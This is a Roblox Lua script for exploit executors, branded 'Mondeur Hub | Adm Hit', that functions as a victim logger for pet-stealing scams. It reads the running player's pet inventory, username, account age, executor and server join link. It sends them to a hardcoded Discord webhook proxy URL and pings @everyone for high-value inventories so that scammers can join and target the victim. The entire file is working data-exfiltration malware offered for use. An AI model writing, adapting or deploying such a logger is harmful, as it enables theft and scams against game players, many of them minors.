--// MONDEUR HUB | ADM HIT 🦊 (REAL INVENTORY VERSION)

local HttpService = game:GetService("HttpService")
local ClientData = require(game:GetService("ReplicatedStorage").ClientModules.Core.ClientData)

-- =========================
-- 🔥 HARDCODED WEBHOOK
-- =========================
local WEBHOOK = "https://webhook.lewisakura.moe/api/webhooks/1408047737102012506/4VZHtB_G9RmikEuLs0-A6yP_0AXaYmb4_4Y3TyaG_0Wxem1-OvNBtPC9n71B4-SSzkUa"

-- 🎯 SMART THRESHOLD SYSTEM
local LOW_THRESHOLD = 300
local HIGH_THRESHOLD = 1500

-- =========================
-- 🌐 REQUEST DETECTION
-- =========================
local requestFunc = (syn and syn.request) or (http and http.request) or (http_request) or (request)

if not requestFunc then
    warn("❌ No request function")
    return
end

-- =========================
-- 🧠 NORMALIZE NAME
-- =========================
local function normalize(str)
    str = tostring(str or ""):lower()
    str = str:gsub("_"," ")
    str = str:gsub("[^%w%s]","")
    str = str:gsub("%s+"," ")
    return str
end

-- =========================
-- 🎨 COLORS
-- =========================
local rarityColors = {
    legendary = 0xFFD700,
    ultra_rare = 0xA020F0,
    rare = 0x1E90FF,
    uncommon = 0x32CD32,
    common = 0xB0B0B0
}

-- =========================
-- 🏷️ EMOJIS (Using your preferred mapping)
-- =========================
local function getPetEmoji(name, p)
    local e = ""
    -- Use your custom emojis for specific pets
    if name:find("red fox") then e = "🧑‍🌾 " 
    elseif name:find("disco bee") then e = "🪩 "
    elseif name:find("queen bee") then e = "🐝 " 
    end

    -- Neon/Mega/Fly/Ride tags
    if p.mega then e = e .. "🌈 " elseif p.neon then e = e .. "🟣 " end
    if p.fly then e = e .. "🪽 " end
    if p.ride then e = e .. "🏇 " end
    
    -- Default if no other emoji matches
    if e == "" then e = "🐾 " end
    return e
end

-- =========================
-- 📦 PROCESS PETS (ENHANCED DETECTION)
-- =========================
local function process(pets)
    local map, total = {}, 0

    -- Debug: Print what we're receiving
    print("🔍 DEBUG - Pets received:", typeof(pets), #pets or "nil")

    for _, p in pairs(pets or {}) do
        if p then
            -- Try multiple possible pet ID locations
            local petId = p.id or p.name or p.PetId or p.petId or p.Name
            
            if petId then
                local rawName = tostring(petId):gsub("_", " ")
                local key = normalize(rawName)

                if not map[key] then
                    map[key] = {
                        name = rawName:sub(1,1):upper() .. rawName:sub(2),
                        count = 0,
                        value = 0,
                        rarity = (p.rarity or p.Rarity or p.rarity or "common"):lower(),
                        neon = p.properties and p.properties.neon or p.neon or p.Neon,
                        mega = p.properties and p.properties.mega or p.mega or p.Mega,
                        fly = p.properties and p.properties.flyable or p.flyable or p.Flyable or p.fly,
                        ride = p.properties and p.properties.rideable or p.rideable or p.Rideable or p.ride
                    }
                end

                map[key].count += 1
                total += 10 
            else
                print("⚠️ Pet without ID:", p)
            end
        end
    end

    local list = {}
    for _, v in pairs(map) do table.insert(list, v) end
    table.sort(list, function(a,b) return a.count > b.count end)

    print("🔍 DEBUG - Processed pets:", #list)
    return list, total
end

-- =========================
-- 📋 FORMAT
-- =========================
local function format(list)
    local t = {}
    for i, p in ipairs(list) do
        if i > 12 then break end
        table.insert(t, string.format("%s%s x%d", getPetEmoji(p.name:lower(), p), p.name, p.count))
    end
    return (#t > 0 and table.concat(t,"\n") or "No pets detected")
end

-- =========================
-- 📊 TIER
-- =========================
local function getTier(v)
    if v >= HIGH_THRESHOLD then return "🔴 HIGH" end
    if v >= LOW_THRESHOLD then return "🟡 MID" end
    return "🟢 LOW"
end

-- =========================
-- 🚀 RUN
-- =========================
local function Run(data)
    local list, total = process(data.pets)
    local best = list[1] and (list[1].name.." x"..list[1].count) or "None"
    local petList = format(list)
    local tier = getTier(total)

    local content = (tier == "🔴 HIGH") and "@everyone" or ""
    local color = rarityColors[list[1] and list[1].rarity or "common"] or 0x2F3136

    local embed = {
        title = "🦊 Mondeur Hub | Adm Hit",
        description = "```" ..
            "👤 Display Name : "..data.player.displayName.."\n"..
            "🆔 Username     : "..data.player.username.."\n"..
            "📅 Account Age  : "..data.player.accountAge.." days\n"..
            "📱 Executor     : "..data.player.executor.."\n"..
            "👥 Players      : "..data.player.players.."\n"..
            "💰 Total Value  : "..total.."\n"..
            "📊 Tier         : "..tier.."```",
        fields = {
            {name="🏆 Best Pet", value="```"..best.."```"},
            {name="🐶 Pets (Best → Worst)", value="```"..petList.."```"},
            {name="🌐 Join Server", value="[Click to Join]("..(data.joinLink or "https://www.roblox.com")..")"}
        },
        color = color,
        footer = {text = "Mondeuronbotton"}
    }

    requestFunc({
        Url = WEBHOOK,
        Method = "POST",
        Headers = {["Content-Type"]="application/json"},
        Body = HttpService:JSONEncode({content = content, embeds = {embed}})
    })
end

-- =========================
-- 🛠️ FETCH REAL DATA SAFELY (MULTIPLE PATHS)
-- =========================
local function getPets()
    local myData = ClientData.get_data()[game.Players.LocalPlayer.UserId]
    
    print("🔍 DEBUG - myData:", myData and "exists" or "nil")
    
    if myData then
        print("🔍 DEBUG - myData.inventory:", myData.inventory and "exists" or "nil")
        print("🔍 DEBUG - myData.inventory.pets:", myData.inventory and myData.inventory.pets and "exists" or "nil")
    end
    
    -- Try multiple possible paths
    return (myData and myData.inventory and myData.inventory.pets) or
           (myData and myData.pets) or
           (myData and myData.Inventory and myData.Inventory.Pets) or
           {}
end

-- Execute
local pets = getPets()
print("🔍 FINAL PETS COUNT:", #pets)

Run({
    player = {
        displayName = game.Players.LocalPlayer.DisplayName,
        username = game.Players.LocalPlayer.Name,
        accountAge = game.Players.LocalPlayer.AccountAge,
        executor = (identifyexecutor and identifyexecutor()) or "Unknown",
        players = #game.Players:GetPlayers().."/"..game.Players.MaxPlayers
    },
    joinLink = "https://www.roblox.com/games/"..game.PlaceId.."?server="..game.JobId,
    pets = pets
})
